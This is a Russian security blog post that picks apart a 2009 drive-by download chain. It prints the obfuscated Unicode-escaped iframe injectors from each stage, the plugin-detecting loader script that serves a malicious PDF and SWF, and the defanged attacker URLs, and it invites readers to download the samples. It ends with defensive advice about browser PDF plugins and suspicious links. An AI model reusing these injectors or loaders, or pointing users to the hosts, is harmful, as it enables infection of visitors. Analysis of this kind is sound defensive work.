Pull to refresh

Новый-старый pdf exploit

Information Security *
p.s.2: В этом топике вируса нет, хотя „Авасту“ может казаться иначе (спасибо edio)

Всё началось с невинного сообщения в icq от моей хорошей знакомой:
31.07.2009 18:45:11 xyz: смотри hxxp://watnhome.com/images/car.gif :)

Вроде ничего подозрительного. Ну ладно, думаю, зайду. Там рендер BMW какой-то. В общем, довольно приятный. Картинка уже загрузилась, а индикатор загрузки страницы всё не заканчивался… это сработало для меня как тревожный звоночек. Я тут же ткнул Esc, после чего Огнелис остановил загрузку в закладке. С мыслью, что тут надо разобраться, я (с чего-то) решил посмотреть исходный код картинки. По идее, там должна была быть какая-то ерунда, как в любом gif-jpeg изображении, НО! Реальность оказалась горазно интереснее. Итак, смотрим в браузере исходник картинки:
view-source:hxxp://watnhome.com/images/car.gif

Ого! Да это же совсем и не картинка ни разу.
<img src="WorleyVision5.jpg">
<script type="text/javascript" src="js.js"></script>

Так-так, интересно, что в яваскрипте?
Смотрим!
view-source:hxxp://watnhome.com/images/js.js
Там оказывается лёгкая ерунда:
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006c\u0069\u0073\u0074\u0065\u006e\u007a\u002e\u006f\u0072\u0067\u002f\u0073\u0074\u0061\u0074\u0073\u002f\u0072\u0075\u0031\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')
Или, переводя в более читабельный вид…
document.write('<iframe src="hxxp://listenz.org/stats/ru1.php" style="display:none"></iframe>')


Редирект. Хорошо, не привыкать, идём по цепочке дальше:
view-source:hxxp://listenz.org/stats/ru1.php
Ага, привет от того же автора:
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0076\u0065\u0072\u0069\u0076\u0065\u006c\u006c\u002e\u0063\u006f\u006d\u002f\u0075\u0070\u0064\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
или, чуть более читабельно…
<script type="text/javascript">document.write('<iframe src="hxxp://verivell.com/upd/index.php" style="display:none"></iframe>')</script>


Это и есть конец зловредной цепочки:
view-source:hxxp://verivell.com/upd/index.php
<script>
function PDF_SWF_Iframe(sCn)
{
  document.write(sCn);
}

if(navigator.userAgent.indexOf('MSIE') != -1)
{
  PDF = new Array('AcroPDF.PDF', 'PDF.PdfCtrl');
  for(i in PDF)
  {
    try
    {
      obj = new ActiveXObject(PDF[i]);

      if (obj)
      {
        PDF_SWF_Iframe('<iframe src=evenLike.pdf></iframe>');
      }
    }

    catch(e){}
  }

  try
  {
    obj = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');

    if (obj)
    {
      PDF_SWF_Iframe('<iframe src=normalDummyBelief.swf></iframe>');
    }
  }
  catch(e){}
}

else
{
  for(i = 0; i <= navigator.plugins.length; i++)
  {
    var plugin = navigator.plugins[i].name;

    if((plugin.indexOf('Adobe Acrobat') != -1) || (plugin.indexOf('Adobe PDF') != -1))
    {
      PDF_SWF_Iframe('<iframe src=evenLike.pdf></iframe>');
    }

    if(plugin.indexOf('Flash') != -1)
    {
      PDF_SWF_Iframe('<iframe src=normalDummyBelief.swf></iframe>');
    }
  }
}
</script>


* This source code was highlighted with Source Code Highlighter.

То есть, добро пожаловать на компьютер pdf (evenLike.pdf — инфицирован Exploit.Win32.Pidief.bfz) и swf, наши самые любимые друзья. Я уже не стал разбирать дальше: эти скрипт и документы эксплуатируют свежую июльскую уязвимость (топик на Хабре), февральскую, а может быть и более старую. Если помните, одно время по сети ходила ссылка на «вирусный ролик» на сайте Альфастраха, который, как оказалось, был вирусным без кавычек, потому что сажал на компьютер пользователя Trojan-Spy.Win32.Zbot.gkj.

Хотите поиграться? Вы легко можете скачать себе эти документы, и посмотреть, что каждый из них творит. Если этого недостаточно, то есть другой «пример», но автор предупреждает, что ‘This virus is srs business!‘ («этот вирус – нешуточное дело»).

Так что совместно с сайтом TechBytesDaily я призываю вас отключить показ pdf в окне браузера, как бы удобно это ни казалось. Всегда сохранять pdf документы, и по возможности, пользоваться бесплатыми не столь дырявыми аналогами Адоби Акробата (как Foxit Reader, Sumatra PDF). К сожалению, плагин от Адоби не фильтрует достаточным образом получаемый контент перед тем, как отдать показать его пользователю в браузере.

И ещё раз о безопасности: будьте внимательны к непонятным сообщениям даже от хорошо знакомых людей, особенно если в нём есть ссылка на неизвестный ресурс и нет личного комментария от автора.

p.s. В ссылках http на hxxp исправлено мной специально.
Tags: pdfexploitbrowserweb-securityбезопасностьуязвимости браузеров
Hubs: Information Security
Total votes 122: ↑117 and ↓5 +112
Comments 83
Comments Comments 83

Popular right now